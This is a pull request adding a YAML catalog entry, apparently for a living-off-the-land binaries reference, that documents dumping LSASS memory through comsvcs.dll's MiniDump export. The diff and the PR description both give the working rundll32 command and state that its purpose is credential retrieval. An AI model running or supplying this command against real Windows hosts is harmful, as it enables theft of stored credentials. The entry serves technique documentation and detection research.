### PR TITLE
Add Comsvcs.yml: dump lsass via signed DLL.

### DIFF
--- a/yml/OSLibraries/comsvcs.yml
+++ b/yml/OSLibraries/comsvcs.yml
@@ -1,0 +1,26 @@
+---
+Name: Comsvcs.dll
+Description: COM+ Services
+Author:
+Created: '2019-08-30'
+Commands:
+  - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
+    Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. 
+    UseCase: Dump Lsass.exe process memory to retrieve credentials.
+    Category: Dump
+    Privileges: SYSTEM
+    MitreID: T1003
+    MItreLink: https://attack.mitre.org/wiki/Technique/T1003
+    OperatingSystem: Windows
+Full_Path:
+  - Path: c:\windows\system32\comsvcs.dll
+Code_Sample:
+  - Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
+Detection:
+  - IOC:
+Resources:
+  - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
+Acknowledegment:
+  - Person: modexp (modexp.wordpress.com)
+    Handle: 
+---


### PR DESCRIPTION
Another technique to dump lsass process memory via a Microsoft signed library. Discovered and published by [modexp](https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/).

To use: 
```
rundll32 C:\windows\system32\comsvcs.dll MiniDump "1234 dump.bin full"
```

Note: the process executing the above command must have _SeDebugPrivilege_.